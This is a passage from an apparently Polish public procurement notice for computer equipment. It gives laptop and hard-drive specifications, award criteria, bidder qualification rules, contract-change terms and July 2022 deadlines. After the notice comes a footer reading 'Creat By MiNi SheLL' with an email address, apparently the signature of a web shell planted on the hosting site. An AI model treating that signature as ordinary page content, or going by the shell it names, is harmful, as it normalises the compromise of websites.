wskaźnika myszy.<br/> • System operacyjny i system pomocy (zainstalowany w systemie) powinien być w wersji polskiej.<br/> • wsparcie techniczne i aktualizacje systemu operacyjnego i programu antywirusowego powinno być dostępne do minimum końca 2025 r.<br/>18<br/>Gwarancja producenta <br/> • Minimalnie 24 miesiące.<br/>19<br/>Ubezpieczenie<br/> • Dodatkowa ochrona na wypadek przypadkowego uszkodzenia, zalania, przepięcia prądu na okres 36 miesięcy – ubezpieczenie zacznie obowiązywać po protokolarnym przekazaniu sprzętu do Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213100-6 - Komputery przenośne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.4. Część IV zamówienia - Dyski twarde (12 szt.)<br/>Lp.<br/>Parametr<br/>Wymagania<br/>1<br/>Zgodność<br/>Zgodność z urządzeniem Synology RS2418RP+ wg „Lista zgodności produktów firmy Synology” (https://www.synology.com/pl-pl/compatibility) w klasie dysku „Enterprise”<br/>2<br/>Interfejs<br/>SATA 6 Gb/s<br/>3<br/>Prędkość obrotowa<br/>minimalnie 7200 obr./min<br/>4<br/>Pojemność<br/>minimalnie 10 TB<br/>5<br/>MTBF<br/>minimalnie 2 mln. godzin<br/>6<br/>Gwarancja producenta<br/>minimalnie 60 miesięcy<br/>7<br/>Format<br/>3,5 cala<br/>8<br/>Bufor danych<br/>minimalny 256 MB </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30237400-3 - Akcesoria do wprowadzania danych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zdolności technicznej lub zawodowej: (określenie warunków): Zamawiający wymaga należytego wykonania dostaw, w<br/>okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie,<br/>polegających na dostawie co najmniej:<br/>• 2.4.1. tj. dla części I - dostawa sprzętu komputerowego o wartości co najmniej 200.000, 00 zł brutto (dwieście tysięcy<br/>złotych).<br/>• 2.4.2. tj. dla części II - dostawa sprzętu komputerowego o wartości co najmniej 100.000,00 zł brutto (sto tysięcy złotych).<br/>• 2.4.3 tj. dla części III - dostawa sprzętu komputerowego o wartości co najmniej 65.000,00 zł brutto (sześćdziesiąt pięć<br/>tysięcy złotych).<br/>• 2.4.4. tj. dla części IV – dostawa sprzętu komputerowego o wartości co najmniej 14.000, 00 zł brutto (czternaście tysięcy<br/>złotych).<br/>Ponadto dla części I, II, III, IV na potwierdzenie, że oferowane urządzenia dostarczone w ramach realizowanego<br/>zamówienia spełniają wymagania określone przez Zamawiającego, Wykonawca jest zobowiązany wraz z ofertą złożyć:<br/>a) kartę katalogową/karty katalogowe urządzeń lub<br/>b) opis techniczny urządzeń zawierające dane umożliwiające sprawdzenie parametrów tych urządzeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wstępnego<br/>wykazania braku podstaw wykluczenia określonych w niniejszej swz, na<br/>zamawiający żąda następujących dokumentów: 1) Podpisane oświadczenie, o braku podstaw do<br/>wykluczenia –według załączonego wzoru.Wykonawca, w przypadku polegania na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w<br/>pkt.1,także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw<br/>wykluczenia tego podmiotu - według załączonego wzoru. W stosunku do Wykonawcy, którego oferta<br/>zostanie najwyżej oceniona, Zamawiający w celu potwierdzenia braku podstaw wykluczenia pobierze<br/>samodzielnie odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności<br/>gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. W przypadku gdy Wykonawca polega na<br/>zdolnościach lub sytuacji innych podmiotów na zasadach określonych<br/>wart.125ust.1 ustawy pzp, - w odniesieniu do tych podmiotów Zamawiający pobierze samodzielnie<br/>dokument.Zamawiający pobierze samodzielnie dokument dotyczący podwykonawcy,któremu<br/>Wykonawca zamierza powierzyć wykonanie części zamówienia, a który nie jest podmiotem, na którego<br/>zdolnościach lub sytuacji wykonawca polega na zasadach określonych w art. 125 ust.1. W przypadku<br/>wspólnego ubiegania się o zamówienie –w odniesieniu do tych podmiotów Zamawiający pobierze<br/>samodzielnie dokument. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania po za granicami<br/>Rzeczypospolitej Polskiej, zamiast odpisu albo informacji z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej - składa dokument lub dokumenty<br/>wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania,potwierdzające<br/>odpowiednio, że :a)nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza<br/>likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona<br/>ani nie znajduje się on w innej tego<br/>rodzaju sytuacji wynikającej z podobnej procedury przewidzianej przepisach miejsca wszczęcia tej<br/>procedury. Dokumenty, o których mowa powyżej, powinny być wystawione nie wcześniej niż 3 miesiące<br/>przed ich złożeniem podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami<br/>tych podmiotów – wzór oświadczenia stanowi załącznik nr 3 do SWZ.<br/>2) wykaz dostaw lub usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w<br/>okresie 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane lub są wykonywane, oraz załączenie dowodów<br/>określających, czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych nadal wykonywanych referencji bądź inne dokumenty potwierdzające ich należyte<br/>wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy.<br/>- Zakres referencji i innych dokumentów musi potwierdzać spełnianie odpowiednio warunku określonego w Rozdziale VII ust. 2 pkt<br/>2.4. ppk. 2.4.1, 2.4.2, 2.4.3, 2.4.4 SWZ. -Wzór wykazu stanowi Załącznik nr 5 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Aktualne<br/>na dzień składania ofert oświadczenie o spełnianiu warunków udziału<br/>w postępowaniu złożone pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym – wzór oświadczenia stanowi załącznik nr 2 do SWZ,<br/>W przypadku gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu, polega na zdolnościach lub<br/>sytuacji podmiotów udostępniających zasoby wykonawca składa wraz z ofertą (za pośrednictwem miniPortalu) zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe UWAGA wraz z ofertą :<br/>• W przypadku dostarczania produktów:<br/>a) próbek, opisów lub fotografii dostarczonych produktów, których autentyczności musi zostać poświadczone przez<br/>Wykonawcę na żądanie Zamawiającego.<br/>Uwaga: dla części I, II, III, IV na potwierdzenie, że oferowane urządzenia dostarczone w ramach realizowanego zamówienia<br/>spełniają wymagania określone przez Zamawiającego, Wykonawca jest zobowiązany wraz z ofertą złożyć:<br/>a) kartę katalogową/karty katalogowe urządzeń<br/>lub<br/>b) opis techniczny urządzeń zawierające dane umożliwiające sprawdzenie parametrów tych urządzeń. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są<br/>niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>Wezwanie Zamawiającego o uzupełnienie jest wezwaniem jednokrotnym w obrębie tego samego przedmiotowego środka<br/>dowodowego. Jeżeli braki w obrębie dokumentów przedmiotowych nie zostaną usunięte lub dokumenty przedmiotowe<br/>zawierają błędy, w tym nie potwierdzają okoliczności , jakich Zamawiający wymagał od dokumentu , oferta, do której<br/>załączone zostały takie dokumenty, podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 2 lit. c). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia(możliwość<br/>składania jednej oferty przez dwa lub więcej podmiotów np. konsorcjum, spółkę cywilną) wraz z<br/>ofertą wykonawcy zobowiązani są złożyć pełnomocnictwo do reprezentowania ich w<br/>postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.- nie dotyczy spółki cywilnej, o ile<br/>upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z dołączonej do<br/>oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę. Dokument musi zostać złożony<br/>pod rygorem nieważności w formie elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznym lub postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym. Dopuszczalne jest również złożenie kopii dokumentu elektronicznie poświadczonej<br/>przez notariusza.3. Wykonawcy wspólnie ubiegający się o udzielenie zamówieniadołączają do<br/>oferty oświadczenie (za pośrednictwem mini Portalu), z którego wynika, które roboty<br/>budowlane,dostawy lub usługi wykonają poszczególni wykonawcy – wzór oświadczenia stanowi<br/>załącznik nr2 do SWZ. Oświadczenie to jest podmiotowym środkiem dowodowym. 4.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są na wezwanie<br/>Zamawiającego,złożyć podmiotowe środki dowodowe, o których mowa w pkt. 6 niniejszego<br/>Rozdziału , przy czym podmiotowe środki dowodowe, o których mowa:a) w pkt. 6 ppkt 2) SWZ<br/>składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą spełnienie warunku b) w<br/>pkt. 6ppkt 1) SWZ składa każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.Poleganie na zdolnościach podmiotów udostępniających zasoby.5. W przypadku<br/>gdy wykonawca, w celu potwierdzenia spełniania warunków udziału w postępowaniu,polega na<br/>zdolnościach lub sytuacji podmiotów udostępniających zasoby wykonawca składa wraz z<br/>ofertą(za pośrednictwem miniPortalu) zobowiązanie podmiotu udostępniającego zasoby do<br/>oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie,będzie<br/>dysponował niezbędnymi zasobami tych podmiotów – wzór oświadczenia stanowi załącznik nr<br/>3do SWZ.Zobowiązanie podmiotu udostępniającego zasoby,ma potwierdzać, że stosunek<br/>łączący wykonawcę z podmiotami udostępniającymi zasoby gwarantuje rzeczywisty dostęp do<br/>tych zasobów i określa w szczególności:1) zakres dostępnych wykonawcy zasobów podmiotu<br/>udostępniającego zasoby,2) sposób i okres udostępniania wykonawcy i wykorzystania przez<br/>niego zasobów podmiotu udostępniającego te zasoby przy wykonywaniu zamówienia,3) czy i w<br/>jakim zakresie podmiot udostępniający, na zdolnościach którego wykonawca polega w<br/>odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia,kwalifikacji<br/>zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane<br/>zdolności dotyczą.Zobowiązanie podmiotu trzeciego należy złożyć wformie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lubpostaci elektronicznej opatrzonej<br/>podpisem zaufanym lub podpisem osobistym. Dokumenty, w tym zobowiązanie podpisuje<br/>podmiot, od którego te dokumenty pochodzą, chyba, że zostanie udzielone Wykonawcy<br/>pełnomocnictwo do podpisania takich dokumentów za podmiot trzeci/podwykonawcę <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazana jest zmiana istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano<br/>wyboru Wykonawcy, z zastrzeżeniem ust. 2.<br/>2. Dopuszczalne są następujące rodzaje i warunki zmiany treści umowy:<br/>a) zmiana terminu dostawy przedmiotu zamówienia powstałych z winy Zamawiającego, a spowodowanych okolicznościami,<br/>których nie mógł przewidzieć w chwili zawarcia umowy;<br/>b) zmiana warunków umowy w przypadku zaistnienia innej, niemożliwej do przewidzenia w momencie zawarcia Umowy<br/>okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze Stron nie ponosi odpowiedzialności, skutkująca<br/>brakiem możliwości należytego wykonania Umowy, zgodnie ze specyfikacją warunków zamówienia,<br/>c) zmiana terminu dostawy oraz terminu lub zasad płatności na skutek wystąpienia przyczyn zewnętrznych niezależnych od<br/>Zamawiającego oraz Wykonawcy, których nie można było przewidzieć w chwili zawarcia umowy,<br/>d) zamiana elementów/ przedmiotu dostaw w stosunku do tych, które Wykonawca przyjął w ofercie, przy czym zmieniane<br/>elementy/ przedmioty nie mogą mieć parametrów technicznych gorszych niż pierwotnie zaoferowane,<br/>e) zmiana całkowitego wynagrodzenia określonego w § 7 ust. 1 Umowy w przypadku:<br/>- zmiany stawki podatku od towarów i usług o wartość wynikającą ze zmiany,<br/>- zmniejszenia ilości przedmiotów (o nie więcej niż 2 szt.) spowodowane okolicznościami, za które Zamawiający nie ponosi<br/>odpowiedzialności, w takim przypadku wynagrodzenie rozliczone zostanie zgodnie z ilością dostarczonych przedmiotów,<br/>f) zmiany zapisów umowy, które nie są istotne.<br/>3. Niezależnie od postanowień wyżej wymienionych zmiana umowy jest dopuszczalna również w innych przypadkach i na<br/>zasadach, o których mowa w art. 455 ust 1 pkt. 2-4 i ust. 2 ustawy PZP.<br/>4. Zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron wyrażoną w formie pisemnego<br/>aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-22 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-21</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <p class="mb-0">Część 3 : <span class="normal">Tak</span></p> <p class="mb-0">Część 4 : <span class="normal">Tak</span></p>

Creat By MiNi SheLL
Email: jattceo@gmail.com